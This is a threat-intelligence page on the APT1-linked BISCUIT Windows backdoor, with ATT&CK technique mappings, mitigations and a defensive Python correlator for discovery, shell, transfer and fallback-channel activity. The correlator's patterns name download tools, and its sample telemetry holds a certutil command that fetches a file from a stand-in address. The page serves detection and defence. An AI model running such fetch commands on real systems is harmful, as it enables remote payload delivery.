S0017: BISCUIT
Analyst context for executives and security teams
BISCUIT matters because ATT&CK records it as a Windows backdoor associated with long-running APT1 activity. For leaders, the practical issue is not the malware name alone; it is the behavior pattern: command-and-control resilience, discovery of users/systems/processes, command execution, file transfer, keylogging, and screen capture. Those behaviors can turn one compromised Windows endpoint into a source of credential exposure, internal reconnaissance, and sustained remote access.
Executive priority
Treat BISCUIT as a coverage-validation use case for post-compromise Windows backdoor activity. Security leaders should ask whether SOC, IR, and audit teams can prove visibility into command shell execution, discovery commands, suspicious inbound tool transfer, encrypted or fallback command-and-control, and collection behaviors such as keylogging or screenshots. Because MITRE provides no official detection text for this object, priority should be on validating control and telemetry readiness rather than assuming existing tools detect this malware family by name.
Technical view
ATT&CK lists BISCUIT as Windows malware and relates it to APT1 usage plus techniques including Fallback Channels, System Owner/User Discovery, Keylogging, Process Discovery, Windows Command Shell, System Information Discovery, Ingress Tool Transfer, Screen Capture, System Time Discovery, and Asymmetric Cryptography. SOC and IR teams should map detections to those behaviors rather than only to signatures. Validate endpoint process telemetry for cmd.exe usage and discovery activity, host evidence of screen/keylogging-like collection, file creation or transfer events consistent with tool ingress, and network telemetry that can expose unusual command-and-control patterns, including alternate channels and encrypted traffic metadata.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- Parent-child process relationships involving Windows command shell execution
- User, process, system information, and system time discovery evidence
- Endpoint file creation, download, and transfer events
- Network connection metadata for outbound command-and-control patterns
Detection direction
- Build behavior-based analytic coverage around the related ATT&CK techniques instead of relying only on a BISCUIT malware name or hash.
- Correlate discovery commands, command shell execution, file transfer, and outbound network activity from the same Windows host or user context.
- Review false positives from administrators, software deployment tools, remote support utilities, and monitoring agents that may legitimately perform discovery or file transfer.
- Pay special attention to visibility gaps created by encrypted command-and-control and fallback channels; network metadata and endpoint correlation are likely more useful than content inspection alone.
- Because official detection guidance is not provided, require local testing or purple-team validation to confirm whether existing EDR, SIEM, proxy, and firewall data can support investigations.
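One way to put the correlation described in the list above (and in the technical view) into practice, as an added example: this is not Glexia's or MITRE's code, and the page itself supplies no detection logic. The script below is a small Python correlator over constructed Sysmon-style process-creation and network-connection records. It maps command lines to the technique IDs in this page's table, drops events whose image or parent is on a constructed allowlist of deployment and monitoring agents (the false-positive sources named above), flags a T1008 fallback-channel candidate when the same host/user/image fails to reach one destination and then succeeds to a different one, and raises an alert for a host/user context only when several distinct tactics appear inside one time window. The field names, regex patterns, allowlist entries, 30-minute window and sample events are all assumptions made for the example.

```python
"""Behavior correlation for post-compromise Windows backdoor activity.

Added example; not Glexia, MITRE or BISCUIT-specific code. Event shapes are
constructed to resemble Sysmon process-creation (EID 1) and network (EID 3)
records; field names, patterns and the allowlist are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # assumed correlation window

# Command-line fragments mapped to techniques from this page's table (illustrative, not a rule set).
CMDLINE_TECHNIQUES = [
    (re.compile(r"\bwhoami\b|\bquery user\b"), "T1033"),
    (re.compile(r"\btasklist\b|\bget-process\b"), "T1057"),
    (re.compile(r"\bsysteminfo\b|\bwmic\s+os\b"), "T1082"),
    (re.compile(r"\bnet time\b|\bw32tm\b|\bget-date\b"), "T1124"),
    (re.compile(r"\bcertutil\b.*-urlcache|\bbitsadmin\b.*/transfer|invoke-webrequest"), "T1105"),
]
SHELL_IMAGES = {"cmd.exe"}  # T1059.003
# Deployment/monitoring agents that legitimately run discovery and transfers (constructed allowlist).
ALLOWLISTED_PARENTS = {"ccmexec.exe", "monitoringagent.exe"}
TACTIC_OF = {"T1059.003": "execution", "T1033": "discovery", "T1057": "discovery",
             "T1082": "discovery", "T1124": "discovery", "T1105": "ingress-transfer",
             "T1008": "command-and-control", "NETWORK": "command-and-control"}


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def is_allowlisted(event):
    """True when the image or its parent is a known agent; such events go to false-positive review."""
    return (event["image"].lower() in ALLOWLISTED_PARENTS
            or event.get("parent", "").lower() in ALLOWLISTED_PARENTS)


def classify(event):
    """Return the technique IDs a single process or network event evidences."""
    found = set()
    if event["kind"] == "process":
        if event["image"].lower() in SHELL_IMAGES:
            found.add("T1059.003")
        for pattern, tid in CMDLINE_TECHNIQUES:
            if pattern.search(event["cmdline"].lower()):
                found.add(tid)
    elif event["kind"] == "network" and event["outcome"] == "success":
        found.add("NETWORK")  # outbound metadata only; payload content is not inspected
    return found


def fallback_channel_candidates(events):
    """T1008 heuristic: a host/user/image fails to reach one destination, then within WINDOW
    succeeds to a different destination. One record per failure and its first later success."""
    by_key = defaultdict(list)
    for e in events:
        if e["kind"] == "network" and not is_allowlisted(e):
            by_key[(e["host"], e["user"], e["image"].lower())].append(e)
    hits = []
    for (host, user, image), evs in by_key.items():
        evs.sort(key=_ts)
        for i, fail in enumerate(evs):
            if fail["outcome"] != "failed":
                continue
            for later in evs[i + 1:]:
                if _ts(later) - _ts(fail) > WINDOW:
                    break
                if later["outcome"] == "success" and later["dest"] != fail["dest"]:
                    hits.append({"host": host, "user": user, "image": image, "ts": _ts(later),
                                 "failed_dest": fail["dest"], "fallback_dest": later["dest"]})
                    break
    return hits


def correlate(events, min_tactics=3):
    """Per host/user context, find a WINDOW-sized span covering at least min_tactics distinct
    tactics. Returns {(host, user): sorted technique IDs} for the contexts that trigger."""
    groups = defaultdict(list)
    for e in events:
        if not is_allowlisted(e):
            for tid in classify(e):
                groups[(e["host"], e["user"])].append((_ts(e), tid))
    for hit in fallback_channel_candidates(events):
        groups[(hit["host"], hit["user"])].append((hit["ts"], "T1008"))
    alerts = {}
    for key, seq in groups.items():
        seq.sort()
        best = set()
        for i, (start, _) in enumerate(seq):  # sliding window anchored at each event
            window = {tid for ts, tid in seq[i:] if ts - start <= WINDOW}
            if len(window) > len(best):
                best = window
        if len({TACTIC_OF[t] for t in best}) >= min_tactics:
            alerts[key] = sorted(best)
    return alerts


def _proc(ts, host, user, image, parent, cmdline):
    return {"ts": ts, "host": host, "user": user, "kind": "process",
            "image": image, "parent": parent, "cmdline": cmdline}


def _net(ts, host, user, image, dest, outcome):
    return {"ts": ts, "host": host, "user": user, "kind": "network",
            "image": image, "dest": dest, "outcome": outcome}


SAMPLE_EVENTS = [  # constructed telemetry; hosts, users, images and addresses are made up
    _proc("2024-05-01T09:00:00", "WS01", "corp\\alice", "cmd.exe", "updater.exe", "cmd.exe /c whoami"),
    _proc("2024-05-01T09:01:00", "WS01", "corp\\alice", "cmd.exe", "updater.exe", "cmd.exe /c tasklist /v"),
    _proc("2024-05-01T09:02:00", "WS01", "corp\\alice", "cmd.exe", "updater.exe", "cmd.exe /c systeminfo"),
    _proc("2024-05-01T09:03:00", "WS01", "corp\\alice", "cmd.exe", "updater.exe", "cmd.exe /c net time"),
    _net("2024-05-01T09:05:00", "WS01", "corp\\alice", "updater.exe", "198.51.100.10:443", "failed"),
    _net("2024-05-01T09:06:00", "WS01", "corp\\alice", "updater.exe", "203.0.113.5:443", "success"),
    _proc("2024-05-01T09:08:00", "WS01", "corp\\alice", "certutil.exe", "cmd.exe",
          "certutil -urlcache -split -f https://203.0.113.5/t.bin t.bin"),
    # Benign look-alike: a deployment agent runs inventory and reaches its own server.
    _proc("2024-05-01T09:10:00", "WS02", "corp\\bob", "cmd.exe", "ccmexec.exe", "cmd.exe /c systeminfo"),
    _net("2024-05-01T09:10:30", "WS02", "corp\\bob", "ccmexec.exe", "10.0.0.20:443", "success"),
]

if __name__ == "__main__":
    for (host, user), techniques in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host} {user}: {', '.join(techniques)}")
```

Run as a script, it prints one alert for WS01/alice covering execution, discovery, ingress transfer and command-and-control evidence, and nothing for WS02/bob because the deployment agent is allowlisted. The allowlist is deliberately coarse: in a real estate it should be replaced by the organisation's own inventory of deployment, remote-support and monitoring tools, and the regex table widened to the discovery and transfer commands actually seen locally.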
Mitigation priorities
- Prioritize endpoint hardening and monitoring on Windows systems where this object is applicable.
- Limit unnecessary command shell use through least privilege, application control, and administrative process governance where operationally feasible.
- Strengthen egress monitoring and control so unauthorized outbound channels and tool transfers are harder to sustain.
- Protect credentials and user sessions because related behavior includes keylogging and user discovery.
- Prepare IR playbooks for backdoor containment that include host isolation, credential review, evidence preservation, and network indicator scoping.
Analyst notes and limits
The strongest decision value is in the relationships: BISCUIT is a Windows backdoor tied to APT1 in ATT&CK and mapped to command-and-control, discovery, execution, collection, and credential-access behaviors. This supports a practical defensive test plan across endpoint, identity, and network monitoring without making unsupported claims about current activity or customer exposure.
MITRE provides a short description and no official detection text for BISCUIT. The supplied object does not include aliases, labels, or detailed procedures. Some related technique platform lists are broader than the BISCUIT platform field, so this take treats BISCUIT itself as Windows-focused and uses related techniques only for behavior-mapping. Local environment telemetry is required to determine actual coverage.
BISCUIT
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1113 | Screen Capture | BISCUIT has a command to periodically take screenshots of the system. (Citation: Mandiant APT1 Appendix) |
| Enterprise | T1008 | Fallback Channels | BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server. (Citation: Mandiant APT1) (Citation: Mandiant APT1 Appendix) |
| Enterprise | T1082 | System Information Discovery | BISCUIT has a command to collect the processor type, operating system, computer name, and whether the system is a laptop or PC. (Citation: Mandiant APT1) |
| Enterprise | T1124 | System Time Discovery | BISCUIT has a command to collect the system `UPTIME`. (Citation: Mandiant APT1) |
| Enterprise | T1057 | Process Discovery | BISCUIT has a command to enumerate running processes and identify their owners. (Citation: Mandiant APT1 Appendix) |
| Enterprise | T1105 | Ingress Tool Transfer | BISCUIT has a command to download a file from the C2 server. (Citation: Mandiant APT1 Appendix) |
| Enterprise | T1056.001 | Keylogging Sub-technique | BISCUIT can capture keystrokes. (Citation: Mandiant APT1 Appendix) |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | BISCUIT uses SSL for encrypting C2 communications. (Citation: Mandiant APT1 Appendix) |
| Enterprise | T1033 | System Owner/User Discovery | BISCUIT has a command to gather the username from the system. (Citation: Mandiant APT1 Appendix) |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | BISCUIT has a command to launch a command shell on the system. (Citation: Mandiant APT1 Appendix) |
Groups, software, and campaigns
G0006: APT1
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources (Updates).
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.3 | | Current bundle | 23561972bdec… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Mandiant APT1: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
- [2] BISCUIT: (Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)
- [3] Mandiant APT1 Appendix: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.
- [4] mitre-attack S0017
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.